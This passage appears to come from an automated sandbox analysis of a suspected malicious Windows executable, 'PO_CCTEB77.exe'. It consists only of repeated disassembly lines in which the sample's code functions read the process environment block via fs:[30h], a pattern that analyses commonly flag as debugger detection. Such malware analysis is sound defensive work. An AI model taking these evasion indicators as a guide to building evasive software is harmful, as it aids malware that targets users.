            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E1D0 mov ecx, dword ptr fs:[00000030h]3_2_0183E1D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0183E1D0 mov eax, dword ptr fs:[00000030h]3_2_0183E1D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F0124 mov eax, dword ptr fs:[00000030h]3_2_017F0124
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018961E5 mov eax, dword ptr fs:[00000030h]3_2_018961E5
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F01F8 mov eax, dword ptr fs:[00000030h]3_2_017F01F8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01880115 mov eax, dword ptr fs:[00000030h]3_2_01880115
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186A118 mov ecx, dword ptr fs:[00000030h]3_2_0186A118
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186A118 mov eax, dword ptr fs:[00000030h]3_2_0186A118
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186A118 mov eax, dword ptr fs:[00000030h]3_2_0186A118
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186A118 mov eax, dword ptr fs:[00000030h]3_2_0186A118
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01854144 mov ecx, dword ptr fs:[00000030h]3_2_01854144
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01854144 mov eax, dword ptr fs:[00000030h]3_2_01854144
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01858158 mov eax, dword ptr fs:[00000030h]3_2_01858158
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BA197 mov eax, dword ptr fs:[00000030h]3_2_017BA197
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BA197 mov eax, dword ptr fs:[00000030h]3_2_017BA197
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BA197 mov eax, dword ptr fs:[00000030h]3_2_017BA197
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EC073 mov eax, dword ptr fs:[00000030h]3_2_017EC073
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C2050 mov eax, dword ptr fs:[00000030h]3_2_017C2050
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018580A8 mov eax, dword ptr fs:[00000030h]3_2_018580A8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018860B8 mov eax, dword ptr fs:[00000030h]3_2_018860B8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018860B8 mov ecx, dword ptr fs:[00000030h]3_2_018860B8
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018420DE mov eax, dword ptr fs:[00000030h]3_2_018420DE
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BA020 mov eax, dword ptr fs:[00000030h]3_2_017BA020
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BC020 mov eax, dword ptr fs:[00000030h]3_2_017BC020
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018460E0 mov eax, dword ptr fs:[00000030h]3_2_018460E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE016 mov eax, dword ptr fs:[00000030h]3_2_017DE016
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018020F0 mov ecx, dword ptr fs:[00000030h]3_2_018020F0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01844000 mov ecx, dword ptr fs:[00000030h]3_2_01844000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01862000 mov eax, dword ptr fs:[00000030h]3_2_01862000
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BC0F0 mov eax, dword ptr fs:[00000030h]3_2_017BC0F0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C80E9 mov eax, dword ptr fs:[00000030h]3_2_017C80E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BA0E3 mov ecx, dword ptr fs:[00000030h]3_2_017BA0E3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856030 mov eax, dword ptr fs:[00000030h]3_2_01856030
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01846050 mov eax, dword ptr fs:[00000030h]3_2_01846050
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C208A mov eax, dword ptr fs:[00000030h]3_2_017C208A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018463C0 mov eax, dword ptr fs:[00000030h]3_2_018463C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0187C3CD mov eax, dword ptr fs:[00000030h]3_2_0187C3CD
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018643D4 mov eax, dword ptr fs:[00000030h]3_2_018643D4
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018643D4 mov eax, dword ptr fs:[00000030h]3_2_018643D4
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BC310 mov ecx, dword ptr fs:[00000030h]3_2_017BC310
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E0310 mov ecx, dword ptr fs:[00000030h]3_2_017E0310
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA30B mov eax, dword ptr fs:[00000030h]3_2_017FA30B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA30B mov eax, dword ptr fs:[00000030h]3_2_017FA30B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA30B mov eax, dword ptr fs:[00000030h]3_2_017FA30B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F63FF mov eax, dword ptr fs:[00000030h]3_2_017F63FF
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE3F0 mov eax, dword ptr fs:[00000030h]3_2_017DE3F0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE3F0 mov eax, dword ptr fs:[00000030h]3_2_017DE3F0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017DE3F0 mov eax, dword ptr fs:[00000030h]3_2_017DE3F0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D03E9 mov eax, dword ptr fs:[00000030h]3_2_017D03E9
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA3C0 mov eax, dword ptr fs:[00000030h]3_2_017CA3C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C83C0 mov eax, dword ptr fs:[00000030h]3_2_017C83C0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01842349 mov eax, dword ptr fs:[00000030h]3_2_01842349
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01868350 mov ecx, dword ptr fs:[00000030h]3_2_01868350
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184035C mov ecx, dword ptr fs:[00000030h]3_2_0184035C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184035C mov eax, dword ptr fs:[00000030h]3_2_0184035C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0188A352 mov eax, dword ptr fs:[00000030h]3_2_0188A352
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B8397 mov eax, dword ptr fs:[00000030h]3_2_017B8397
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B8397 mov eax, dword ptr fs:[00000030h]3_2_017B8397
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B8397 mov eax, dword ptr fs:[00000030h]3_2_017B8397
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E438F mov eax, dword ptr fs:[00000030h]3_2_017E438F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E438F mov eax, dword ptr fs:[00000030h]3_2_017E438F
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BE388 mov eax, dword ptr fs:[00000030h]3_2_017BE388
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BE388 mov eax, dword ptr fs:[00000030h]3_2_017BE388
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BE388 mov eax, dword ptr fs:[00000030h]3_2_017BE388
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0186437C mov eax, dword ptr fs:[00000030h]3_2_0186437C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01840283 mov eax, dword ptr fs:[00000030h]3_2_01840283
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01840283 mov eax, dword ptr fs:[00000030h]3_2_01840283
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01840283 mov eax, dword ptr fs:[00000030h]3_2_01840283
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B826B mov eax, dword ptr fs:[00000030h]3_2_017B826B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4260 mov eax, dword ptr fs:[00000030h]3_2_017C4260
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4260 mov eax, dword ptr fs:[00000030h]3_2_017C4260
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C4260 mov eax, dword ptr fs:[00000030h]3_2_017C4260
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018562A0 mov ecx, dword ptr fs:[00000030h]3_2_018562A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018562A0 mov eax, dword ptr fs:[00000030h]3_2_018562A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C6259 mov eax, dword ptr fs:[00000030h]3_2_017C6259
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017BA250 mov eax, dword ptr fs:[00000030h]3_2_017BA250
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B823B mov eax, dword ptr fs:[00000030h]3_2_017B823B
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D02E1 mov eax, dword ptr fs:[00000030h]3_2_017D02E1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D02E1 mov eax, dword ptr fs:[00000030h]3_2_017D02E1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D02E1 mov eax, dword ptr fs:[00000030h]3_2_017D02E1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017CA2C3 mov eax, dword ptr fs:[00000030h]3_2_017CA2C3
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01848243 mov eax, dword ptr fs:[00000030h]3_2_01848243
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01848243 mov ecx, dword ptr fs:[00000030h]3_2_01848243
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D02A0 mov eax, dword ptr fs:[00000030h]3_2_017D02A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D02A0 mov eax, dword ptr fs:[00000030h]3_2_017D02A0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01870274 mov eax, dword ptr fs:[00000030h]3_2_01870274
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE284 mov eax, dword ptr fs:[00000030h]3_2_017FE284
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE284 mov eax, dword ptr fs:[00000030h]3_2_017FE284
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F656A mov eax, dword ptr fs:[00000030h]3_2_017F656A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F656A mov eax, dword ptr fs:[00000030h]3_2_017F656A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F656A mov eax, dword ptr fs:[00000030h]3_2_017F656A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018405A7 mov eax, dword ptr fs:[00000030h]3_2_018405A7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018405A7 mov eax, dword ptr fs:[00000030h]3_2_018405A7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_018405A7 mov eax, dword ptr fs:[00000030h]3_2_018405A7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8550 mov eax, dword ptr fs:[00000030h]3_2_017C8550
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C8550 mov eax, dword ptr fs:[00000030h]3_2_017C8550
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE53E mov eax, dword ptr fs:[00000030h]3_2_017EE53E
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017D0535 mov eax, dword ptr fs:[00000030h]3_2_017D0535
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01856500 mov eax, dword ptr fs:[00000030h]3_2_01856500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_01894500 mov eax, dword ptr fs:[00000030h]3_2_01894500
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC5ED mov eax, dword ptr fs:[00000030h]3_2_017FC5ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FC5ED mov eax, dword ptr fs:[00000030h]3_2_017FC5ED
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EE5E7 mov eax, dword ptr fs:[00000030h]3_2_017EE5E7
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C25E0 mov eax, dword ptr fs:[00000030h]3_2_017C25E0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C65D0 mov eax, dword ptr fs:[00000030h]3_2_017C65D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA5D0 mov eax, dword ptr fs:[00000030h]3_2_017FA5D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FA5D0 mov eax, dword ptr fs:[00000030h]3_2_017FA5D0
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE5CF mov eax, dword ptr fs:[00000030h]3_2_017FE5CF
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE5CF mov eax, dword ptr fs:[00000030h]3_2_017FE5CF
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E45B1 mov eax, dword ptr fs:[00000030h]3_2_017E45B1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E45B1 mov eax, dword ptr fs:[00000030h]3_2_017E45B1
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017FE59C mov eax, dword ptr fs:[00000030h]3_2_017FE59C
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017F4588 mov eax, dword ptr fs:[00000030h]3_2_017F4588
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C2582 mov eax, dword ptr fs:[00000030h]3_2_017C2582
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017C2582 mov ecx, dword ptr fs:[00000030h]3_2_017C2582
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EA470 mov eax, dword ptr fs:[00000030h]3_2_017EA470
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EA470 mov eax, dword ptr fs:[00000030h]3_2_017EA470
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017EA470 mov eax, dword ptr fs:[00000030h]3_2_017EA470
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017E245A mov eax, dword ptr fs:[00000030h]3_2_017E245A
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_017B645D mov eax, dword ptr fs:[00000030h]3_2_017B645D
            Source: C:\Users\user\Desktop\PO_CCTEB77.exeCode function: 3_2_0184A4B0 mov eax, dword ptr fs:[00000030h]3_2_0184A4B0
